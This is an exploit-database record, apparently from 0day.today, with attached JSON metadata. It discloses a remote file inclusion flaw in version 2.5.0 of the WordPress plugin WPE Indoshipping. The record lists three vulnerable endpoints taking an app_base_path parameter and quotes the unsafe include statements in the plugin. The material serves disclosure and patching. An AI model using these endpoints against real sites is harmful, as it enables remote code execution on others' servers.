ID 1337DAY-ID-21559
Type zdt
Reporter altiiever
Modified 2013-11-23T00:00:00
Description
plugin wpe-indoshipping v2.5.0 RFI vuln#### Usage Info
http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path=[RFI]
```========================================================
[+] Title : Wordpress Plugin WPE Indoshipping Remote File Inclusion
[+] Author : Altiiever
[+] Version : 2.5.0
[+] Download : http://downloads.wordpress.org/plugin/wpe-indoshipping.2.5.0.zip
[+] Vulnerability : RFI
```========================================================
|
| [ Vulnerable ]
|
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin-functions.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin.php?app_base_path= [cukZ]
|
| [ Bug ]
|
| [!] wpe_indoshipping.php
| -include $app_base_path.'admin/admin.php';
| [!] admin-functions.php
| -include_once $app_base_path.'upload/'.$dbfile;
| [!] admin.php
| -include $app_base_path.'admin/admin-functions.php';
| -include $app_base_path.'admin/shipping-manager.php';
| -include $app_base_path.'admin/form-builder.php';
| -include $app_base_path.'admin/tools.php';
| -include $app_base_path.'assets/readme.html';
|
# 0day.today [2018-04-08] #
{"id": "1337DAY-ID-21559", "lastseen": "2018-04-08T07:46:36", "viewCount": 10, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-04-08T07:46:36", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/NOVELL_MESSENGER_ACCEPTLANG", "MSF:EXPLOIT/WINDOWS/MISC/MERCURY_PHONEBOOK", "MSF:EXPLOIT/WINDOWS/IMAP/EUDORA_LIST", "MSF:EXPLOIT/LINUX/HTTP/KALTURA_UNSERIALIZE_RCE", "MSF:AUXILIARY/SCANNER/HTTP/CISCO_DIRECTORY_TRAVERSAL", "MSF:EXPLOIT/OSX/SAMBA/TRANS2OPEN", "MSF:EXPLOIT/WINDOWS/MSSQL/LYRIS_LISTMANAGER_WEAK_PASS", "MSF:EXPLOIT/WINDOWS/IMAP/NOVELL_NETMAIL_STATUS"]}, {"type": "zdt", "idList": ["1337DAY-ID-14043", "1337DAY-ID-9783"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21559", "SECURITYVULNS:DOC:14043", "SECURITYVULNS:VULN:9783"]}], "modified": "2018-04-08T07:46:36", "rev": 2}, "vulnersScore": 0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/21559", "description": "plugin wpe-indoshipping v2.5.0 RFI vuln#### Usage Info\nhttp://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path=[RFI]", "title": "Wordpress Plugin WPE Indoshipping Remote File Inclusion", "cvelist": [], "sourceData": "```========================================================\r\n[+] Title : Wordpress Plugin WPE Indoshipping Remote File Inclusion\r\n[+] Author : Altiiever\r\n[+] Version : 2.5.0\r\n[+] Download : http://downloads.wordpress.org/plugin/wpe-indoshipping.2.5.0.zip\r\n[+] Vulnerability : RFI\r\n```========================================================\r\n\r\n|\r\n| [ Vulnerable ] \r\n|\r\n| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path= [cukZ]\r\n| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin-functions.php?app_base_path= [cukZ]\r\n| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin.php?app_base_path= [cukZ]\r\n|\r\n| [ Bug ]\r\n| \r\n| [!] wpe_indoshipping.php\r\n|\t-include $app_base_path.'admin/admin.php';\r\n| [!] admin-functions.php\r\n|\t-include_once $app_base_path.'upload/'.$dbfile;\r\n| [!] admin.php\r\n|\t-include $app_base_path.'admin/admin-functions.php';\r\n|\t-include $app_base_path.'admin/shipping-manager.php';\r\n|\t-include $app_base_path.'admin/form-builder.php';\r\n|\t-include $app_base_path.'admin/tools.php';\r\n|\t-include $app_base_path.'assets/readme.html';\r\n|\n\n# 0day.today [2018-04-08] #", "published": "2013-11-23T00:00:00", "references": [], "reporter": "altiiever", "modified": "2013-11-23T00:00:00", "href": "https://0day.today/exploit/description/21559"}
{}
